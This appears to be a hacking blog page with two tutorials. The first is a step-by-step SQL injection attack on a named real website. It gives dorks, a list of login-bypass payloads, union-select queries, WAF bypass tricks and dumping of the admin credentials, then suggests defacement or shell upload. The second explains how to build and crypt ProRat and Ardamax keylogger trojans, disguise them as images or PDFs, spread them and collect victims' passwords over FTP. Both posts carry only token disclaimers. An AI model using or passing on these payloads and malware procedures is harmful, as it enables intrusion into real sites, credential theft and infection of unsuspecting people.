Basic Sql Injection Tutorials

0

Hello Friends !!!

I am CodeNinja a.k.a. Aakash Choudhary and now I am going to give a basic sql injection tutorial :-

What is SQL Injection:-

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

In SQL Injection we can fetch all important data from websites and can do malicious activity  or can do everything which we want. Its depend on us.

Note:- This tutorial is educational purpose. So learn this technique but don’t harm the website.

So Let’s Start —->

Part 1:- Using Google Dorks

Google Dorks is the best weapon for hackers.So use it wisely. We can find  sql injection websites using dorks.Even you can make your own Dorks

Download Google Dorks from Here :- http://pastebin.com/tq2TBbmB

You can search more Dorks from Google 😛

How to Use Google Dorks :- Lets See

Choose any Dorks and paste in Google and then Choose any site from there Like this —–>

http://lmgtfy.com/?q=inurl%3Atrainers.php%3Fid%3D

And choose any site from there —>

http://prntscr.com/525zvj

So now understand about Google Dorks

 

Part 2:Check Website Vulnerability

Now when we get website then our next part is to check website is  vulnerable to sql injection or not

For this  You have to put   ‘  after number

eg. —–> http://www.tabletworld.co.in/order.php?pid=55 ‘      <—— Notice ‘ after number

This is essential to check vulnerability in site

If site vulnerable you will see this type of Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Its mean site is vulnerable.

Sometime you will not see that error. So notice carefully site that is something images,words is missing or not

Part 3:- Find Injection Point 

Well what is Injection point? See this carefully

Normal Site :-

http://www.tabletworld.co.in

Injection Point of normal Site :-

http://prntscr.com/52689v

Hope you understand this Injection Point

But now question arise that how to find Injection Point in particular site

Well for find injection point We use following methods —->

1.Open every links of  particular site and use  ‘ to check vulnerability 

2. Using Google Dorks  :p

3. Input malicious SQLI Codes in Search bar section or in Login Section

These are Some Malicious SQLI Codes for input

‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —

” or 0=0 —

or 0=0 —

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 —

hi’ or 1=1 —
‘or’1=1’

Now i will tell you to how to fin injection point using Google Dorks. Just use following Dorks in google and you will see you desired results. Just use all of that result one by one

1. inurl:.php?id= site:www.sitename.com

2. site:www.sitename.com “php?”

3.  site:www.target.com php

4. site:www.sitename.com .php? / .php?id=

5. By using bing —> ip:127.0.0.1 “php?id”   where you will use ip of particular site

6. site:”*.site.com” inurl:”php?”

7. site.com/robots.txt

8.  inurl:”.php?id=”+site:www.site.com

Here is live example of using Above Dorks

inurl:.php?id= site:http://www.tabletworld.co.in

Here is result :-

http://prntscr.com/526b0l

So use any site from there

I choose this one

http://www.tabletworld.co.in/order.php?pid=55

Hope you understand this part

Part 4:-  Real SQLI Steps coming now after get vulnerable site

Here is our target

http://www.tabletworld.co.in/order.php?pid=55

Step 1:- Use ‘ after number

http://www.tabletworld.co.in/order.php?pid=55&#8242;

Error :-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Mean site is vulnerable

Step 2:- Find number of columns

For find number of columns we use this commands

1. order by

2. group by

3. procedure analyse()

Well this time i am using only order by command. When you see order by command is not working then we use group by command

About procedure analyse() i will tell later

Order by command ——–>

http://www.tabletworld.co.in/order.php?pid=55 order by 1–       <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 10–     <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order  by 20–    <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 30–     <——- Error

Unknown Column ’30’ in ‘order clause’

Its mean number of columns is less then 30 and above than 20

Some time you will not see that error but some missing on page.So check carefully

http://www.tabletworld.co.in/order.php?pid=55  order by 25–      <—— Error

Unknown  Column ’25’ in ‘order clause’

Its mean number of columns is less than 25

http://www.tabletworld.co.in/order.php?pid=55 order by 24–       <—– No error 😀

Its mean we have  24 number of columns

Step 3: Find vulnerable Columns

Now our next step is to find vulnerable columns in those 24 columns. Because we input our sqli queries in those vulnerable columns

We use this command ——–>  union select

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24– 

Notice  –  before  55. It is necessary when use union select command.But sometimes we not use – before number. We use other methods/tricks instead of – . But when to use and what to use. I will tell about this in other tutorial

Now after that when use union select i see  this WAF Message

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

What is WAF —–> Web Application Firewall

which is use to protect website from hacking attacks.But there is lots of methods to bypass that WAF

These are WAF Messages  —->

406 Not acceptable

403 Forbidden

404

500

In above WAF Messages we use different different  methods to bypass WAF

Now come to that site where we see that above error

To bypass WAF we use  comments —->

/*!*/ like  —> /*!union*/

or

/*!50000*/   —–> /*!50000union*/

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24– 

Well the vulnerable column is —-> 5  &  7

Now our whole desire malicious queries will by putting in those vulnerable column like this

For version —–> version() & @@version

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24– 

Now see carefully. I use version() command by replacing vulnerable column 5

we can also use our queries in both vulnerable column  i.e.  5 & 7

Well why we use version there? Because after check version we come to know that what to do next

Like  —> If version is above than 5 then we can use  information_schema to dump tables,columns

But if version is below than 5 then we dump tables blindly. There we can’t use information_schema

Step 4:- Find tables data

Now our next step is to find table data of website

Commands we use for find table data is —–>

table_name

from

information_schema.tables

where

table_schema=database()

Now how and where to use that above commands?

Lets see

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=database() — 

Notice:- table_name  —-> is in vulnerable column  5. And our rest commands after number 24 but before —

So remember this.  😛

Well  now the result is in message a WAF Message

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Now i use /*!50000*/ in from word like —-> /*!50000from*/

Well how you know where to put WAF Bpass method in which place. Don’t Worry.I will tell you in my other tutorial about first understanding WAF Behavior than apply that WAF Bypass Methods.

Here is the code:-

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() — 

Result :-

http://prntscr.com/528q74

Notice that 

Now i am also  use one more command —->

concat() ——> CONCAT function is used to concatenate two strings to form a single string

group_concat() ——–> GROUP_CONCAT is used when you want to have data from different column rows in a single row. For this you need to have GROUP BY to work.

concat_ws() ——-> CONCAT_WS is just to join two values.

Well in this site when we use group_concat() function we see this error —->

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() —

WAF Message —->

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Bypass using /*!50000group_concat*/()

Like —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000group_concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() —

Now Error —–>

FUNCTION marvelso_tabletworld.group_concat does not exist. Check the ‘Function Name Parsing and Resolution’ section in the Reference Manual

Its mean you can’t use group_concat function there.So we will use concat() there

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() —

Now result —->

http://prntscr.com/529rmf

You see admin table there. What if you not see admin table there? 

Two reasons —->

May be there not admin tables in database

OR 

Because of concat function we are unable to see others tables too

If we use group_concat we can  see all table details on page

But in concat function we are able to see only one table detail.But for see other table detail we use this command—->

limit 0,1

like this

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 0,1 —

You can increase limit   like this —> limit 1,1  limit 2,1  limit 3,1  etc etc

See code —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 1,1 —

And see Result —>

http://prntscr.com/529t6g

Notice that red mark. That is 2nd table of database

Another one using limit 2,1 —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 3,1 —

Another result —>

http://prntscr.com/529tl2

Another 3rd table —> customer

Hope now you understand  to use concat() function using limit 0,1 function. If not you can ask me your doubts.

Step 5:- Find Columns detail

Command for this —->

column_name

from

information_schema.columns

where

table_name=’table name here’

Note :-

Your table name should be in hex format.How i will show you

See this Code  —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e —

Where —-> 

0x61646d696e is —-> admin

Result —->

http://prntscr.com/529wlr

We again use limit function to get more column details

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e  limit 1,1–

Result —>

http://prntscr.com/529x8k

Again next column details using limit 2,1

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e  limit 2,1–

Result —->

http://prntscr.com/529xp7

So now we got our desire column details —->

id,username,password

This detail is enough for hacking as we will get admin details using that

Step 6 :-Find admin details[his name,passowrd etc]

Commands ——>

concat(username,0x3a,x3a,password)   <—–Where 0x3a is hex coding of  :

from

table name here like admin

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(username,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ admin  —

Result:-

http://prntscr.com/52a00l

So,we get admin details of database —>

username:- admin

password:- admin

Part 5:- 

What we do after get admin details i.e. username,password

Well go and find admin page of website where you  put admin details there and enter the world of admin panel.Where you can control everything.What can we do —>

1.Deface the website

2.Shell uploading

3. Destroy the website

 And much much more

Well how to get admin page of website —–>

Just try this following —>

http://sitename.com/admin

http://sitename.com/administrator

http://sitename.com/login

http://sitename.com/robots.txt

These are few. There are others more methods. You can also use  admin finder tools to find admin page.

Well how to use this all and do such things.Don’t Worry i will tell you in my next tutorials.

So stay tune.

Regards  CodeNinja a.k.a. Aakash Choudhary

THANKS

Advertisements

HACK A SYSTEM USING RAT’S

0
Hi friends this is Mystry . This is my first post to hack a system using RATS.
so what do RAT  mean ?

RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basically anything with your computer. Using RAT hacker can install key logger and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

 What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access Trojan. It is a piece of software or program which hacker uses to get complete control of your computer. It can be sent to you in form of images, videos or any other files. There are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

 

 What You Can do With RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:

You are able to install any malicious software(keyloggers…)
Able to monitor the Chat windows
Turn off the system remotely
You can disable antivirus/registry/restore point
Stealing the passwords and License key of their software.
Able to access Control panel
You can add or remove any programs
Show Fake Error messages to victim
Control Printers
Format the Entire Hard drive.
Open FTP(File Transfer Protocol) and transfer files
Control Internet Browser
more fun…

 

 Are RATs Illegal?

Some RATs are legal, and some are not. Legal are the one without backdoor left, and they have ability to close connection anytime. Illegal are used for hacking and they can steal data (Credit Cards, Passwords, private data etc.).

Here is a list of some Legal and Illegal RATs:

Legal:

    • TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
    • UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
    • Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
    • Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.

Illegal:

    • Spy-Net
    • Cerberus Rat
    • CyberGate Rat
    • Sub Seven
    • Turkojan
      • ProRat
    • Ardamax

How do I use these RATs?

For the legal RATs, for example, TeamViewer, give the other party your ID and password (the one who is getting viewed gives the other the information). The other connection then puts the ID. You then have many options to choose from, which are self explanatory (once connected).

For the illegal Rats, you need to portforward it to listen onto a port. You then need to build a server, spread it to others, they run your program, and they’re infected.

How do I port forward?

Port forwarding is easy and important for an illegal RAT. You need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your router (write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.

How do I control server?

Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.

Where and how do I spread?

There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites (uTorrent, Pirate bay etc.), YouTube, etc. Some people use custom made Auto-Spreaders programs to spread their server.

What’s reverse Connection?

A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.

Whats Direct Connection?

A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.

How to work with RATs ?
Step 1:

First of all you have to download Remote Administration Software and install in your system.Step 2:
Then you have to create a server using the RAT software. Here , server is our trojan that is going to bring control over the victims system.

Step 3:
Bind the server with any files(JPEG,doc,txt…). You can bind this using some binder. Most of RATs provides Binding option also.

Step 4:
Send this file to Victim. Once the victim open the file, the server will start to run. It will disable Antivirus, registry,…depending on your configuration.

Step 5:
Find the IP address of the Victim(there is different methods to find IP address, read my previous articles). Once you got the IP address, using your Remote Administration Tool, you can connect to the Remote System.

Now World is under your control.

Connections in RATs
Direct Connection:
In Direct connection, Our system(Remote administration tool installed) is client and the victim system act as server. Our system connects to the Remote System and take control over the system. You have to find the IP address of Victim and connects to the system. Some high secure Firewalls will block the Connecting to the system on Open ports.

Reverse Connection:

Reverse connections is for bypass the Firewall Restrictions on Open ports. Firewall Restrict the Open ports but not the outgoing traffics.
In a Direct connection, client connects with Server using the Open port of Server.
In reverse connection, client open the ports and server connects to the open port.

I think you confused little bit , right? In simple words,
Victim computer connects automatically to our computer in reverse connection (in Direct connection, we have to connect to victim system using their IP address).

OKAY. NOW TO HACK A SYSTEM there are two types of RAT’S

a)  IN THIS TYPE OF RAT WE NEED VICTIM’S IP TO HACK HIS SYSTEM

EX: PRO RAT

b)  IN THIS TYPE OF RAT WE DON’T NEED VICTIM’S IP TO HACK HIS SYSTEM

EX: DARK COMET RAT

 

NOW I WILL LET YOU KNOW HOW TO CREATE RATS OF BOTH KINDS  🙂

NOW TYPE ONE

A)  HERE WE USE PRO RAT TO HACK SYSTEMS

 

Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article.

procedure to setup ProRat

STEP 1. First of all Download ProRat ( FROM NET AT UR OWN RISK AS MOST OF THEM HAVE BACKDOOR).
Crypter Software – To disable  antivirus detection (You can Downland Crypter Software from  net and use in virtual machine or at own risk )   

STEP 2. Open up the program and You should see the following window.



STEP 3. Click on the “Create” button in the bottom. Choose “Create ProRat Server“.

STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.

STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.

STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.

STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.

STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.

STEP  9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.

STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.

NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. After the creation of rat use to to crypt it to spread 🙂

thus we create rats using PRO RAT

 

NOW ITS TIME FOR TYPE TWO :

B)

Hack a Remote Computer Using  Ardamax Keylogger

 

Things we Need : –
1. Ardamax keylogger  Download (from net and use in virtual machine or at own risk )

2. Ftp account – You can create a free ftp account from www.drivehq.com

3. Crypter Software – To disable  antivirus detection (You can Downland Crypter Software from net and use in virtual machine or at own risk )   

Procedure :-

1. After installing  Ardamax keylogger, select and right  click Ardamax keylogger icon from your tasks bar. Now select enter registration key , then put in the name and the serial number which you will get from the downloaded software folder

                                                    

2.  Now right click Ardamax keylogger icon and select  remote installation, click next two times check all  the boxes as shown then finally click next


3. Now click enable and enter a password so that no one can open the keylogger then click next  three times, check “send logs every ” and set your time say 5 min , Then select delivery method as Ftp, finally click next



4. Now enter your ftp account details which you created earlier in my case in enter Ftp host –ftp.drivehq.com ,remote folder -/logs ,user – test, Finally click next


5.  Now check all the boxes and click next, set your time for capturing the screen shots, then click next, If you want you can also change the icon by selecting change icon as shown. Finally select next and click finish



6.  If you’ve done all the steps correctly, you should get a server file (keylogger file ) , But this server file can be easily detected by anti -viruses , So to bypass anti viruses we need to bind and crypt the file ,So to do this open your crypter software (which you downloaded earlier) Now select file 1 as the server file (key logger file which you created) and then select file 2 as any application, select a good application(select a PDF  file for best performance)finally click Crypt file, Now you will get a crypted server file ( key logger file ) which is FUD  ( I.e ) Fully undetectable by anti viruses 

                                                                             
7.  Now send the fully undetectable Server file(keylogger file ) to your victim via email or upload it to any site and ask the victim to download the file.Once the victim clicks the application .Ardamax keylogger will  automatically install and will send logs(containing facebook password email passwords ,chat logs ..etc) to
your ftp account .You can view your victims logs by going  to your ftp account  

 
THUS THE RATS ARE CREATED AND USED TO TAKE OVER CONTROL ON VICTIM’S COMPUTERS
This is a simple and a very effective method of hacking a remote computer.If you have any doubts please be free to post a comment

 

 

Note:
This is just for educational purpose only. Using RAT to control unauthorized system is completely a crime. So Please don’t try to do. (Discussing or Reading about thief technique is not crime but implementing)

soon I will post on ” how to find whether you are a victim of a rat or not   and  how to hack a hacker